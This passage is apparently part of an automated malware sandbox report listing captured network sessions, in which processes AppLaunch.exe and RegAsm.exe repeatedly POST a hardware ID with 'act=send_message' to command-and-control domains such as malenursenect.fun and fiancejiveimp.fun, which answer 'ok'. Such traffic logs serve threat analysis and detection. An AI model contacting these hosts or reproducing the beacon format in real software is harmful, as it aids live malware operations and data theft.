                                                                    Date: Tue, 03 Oct 2023 07:54:28 GMT
                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                    X-Powered-By: PHP/7.4.15
                                                                    Content-Length: 331
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                    Oct 3, 2023 09:54:29.498617887 CEST1547INHTTP/1.0 404 Not Found
                                                                    Date: Tue, 03 Oct 2023 07:54:28 GMT
                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                    X-Powered-By: PHP/7.4.15
                                                                    Content-Length: 331
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    50192.168.2.349885104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:27.362212896 CEST6498OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:27.362647057 CEST6499OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:27.689929008 CEST6502INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=i4cou6a25v9jg6v19nsegv8e00; expires=Sat, 27 Jan 2024 01:42:06 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:27 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZTJRx35CpH9OOGlGwnKQMVAc6QqcpWssXNSIQU3HZ2xI%2BWrwuDcCffHVGO2MlI%2FYisCO1YBiuACKkFoGUgU9lB4tIeIVOC0HZBK%2BACKZSOWhZt3%2BIdXMXTY3ZgeBIH9QMYfcqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f783eb83b8c-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:27.689953089 CEST6502INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    51192.168.2.349886172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:27.700529099 CEST6502OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:27.701097965 CEST6503OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:28.074558973 CEST6504INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=qvmvq82jm76tufrn2lr7s26nua; expires=Sat, 27 Jan 2024 01:42:06 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:27 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9rfhj4r2hIQ2FZ%2FukIGlR%2F5xhAoD0tB9nxSPAJgIyRZex9eNO0irMyrCy%2BoecylE4eNhmyLEO9oWBOsYnEpf1owsX4RIxzdhuONF0mw%2FH27lV%2B1KQbCxdOqX0eBVjw06B0Um5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f7a5d08395c-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:28.074620008 CEST6504INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    52192.168.2.349887104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:28.093411922 CEST6505OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:28.093903065 CEST6505OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:28.354546070 CEST6508INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=7176hvr23093npaeouqj5dvg12; expires=Sat, 27 Jan 2024 01:42:07 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:28 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RJV6fKjYdMrDqp0ISpcA0mm8C%2BBSWPMGSt7bjMgHQ3MoQunJgk70B%2BN26kUkqAIUpbz88bpDXiMsOjxuwYxuAfVw6p0RzfDmpJsrQuKFeBPKIit9iqOpN45AmS5OtUkFLvR7OQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f7cd86c5797-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:28.354573965 CEST6508INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    53192.168.2.349888172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:28.295427084 CEST6506OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:28.295916080 CEST6507OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:28.666513920 CEST6510INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=gsavprh6lrpk6an7hdebs8iiuf; expires=Sat, 27 Jan 2024 01:42:07 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:28 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QjXcKfrDZdFV4g8vdPWOYcRtECKVwEvcLXMtB3Q3Af%2FoZat93LSpWDxA6AYvg9LLAcYdBcfHh2RKfP%2BaSNFh8ktBWGG%2FMyyy5I0emeOaxW1Ojt%2BZxykZ%2FBUWVDP%2FquP136JZmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f7e1e633940-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:28.666570902 CEST6510INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    54192.168.2.349889104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:28.568141937 CEST6509OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:28.568403006 CEST6509OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:28.894670963 CEST6513INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=p9jj71njg5p9l8cnfdfk0e138e; expires=Sat, 27 Jan 2024 01:42:07 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:28 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eVjcW7bACfWXXqH2YpBIxclfxHBg29nrnj%2BRCiVG0tZk9x1p88jEPdYQZ%2F3hByPYoH4ZGhpJ4n7vPHXEMpgDx19jzYifv6%2BzwmJ6ZL%2BXyNOc7k5BXEZm2iJagHrrZ1C2fIg6EA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f7fc8e281a5-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:28.894706011 CEST6513INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    55192.168.2.349890104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:28.888740063 CEST6511OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:28.889103889 CEST6512OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:29.262274981 CEST6516INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=t15pcnt66b4aerpg0neo0cc8oi; expires=Sat, 27 Jan 2024 01:42:08 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:29 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=m1jVUzSaO8Uc0vljrxLGIEmZEQJFAJ%2B%2BGpig088xfaRe8yA0pPG8m38aPGabEaoaLw3cGbjHfl2wobxCijmFzs7%2B4D2yn2Il7pF7LPsHuFpSqLoIU2db4%2BsMtskNxKbg%2Fvwkvw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f81cf5129b5-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:29.262336016 CEST6516INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    56192.168.2.349891172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:29.105947018 CEST6514OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:29.106681108 CEST6514OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:29.348304987 CEST6517INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=e8flvm6utv537i1k600khqh6am; expires=Sat, 27 Jan 2024 01:42:08 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:29 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MjIx2pRcQ4QO7PS2w5c1rdQKeaHjs3nI2CsTjcEKGL3q18S7jEduk1WmRc5uGrkr%2BaHierzM2iDhHPWCvcCqwtK5bYvdVHwpE7aTCSlId1dYyu9u6Dc4RS51wlpnLJGL1knn9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f83291220d6-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:29.348336935 CEST6517INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    57192.168.2.349892104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:29.495928049 CEST6518OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:29.496331930 CEST6519OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:29.857815981 CEST6521INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=vneud5f6c8q1nelp67u55ki8c8; expires=Sat, 27 Jan 2024 01:42:08 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:29 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AFCejcpegt%2B9gFp9ISKDTQDiS4Z3vDtfX2uF%2Fou0AxGDVBbMT1dU2CBvMMq5x5aJmZfPeKrwcwKZ6O8dKrXdW%2BScgib2Y8kyjfhcazpIQsqCSJ%2FVpI6EK8Lvc1kF5%2FbgXbFiRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f85986181e2-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:29.857877970 CEST6521INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    58192.168.2.349893104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
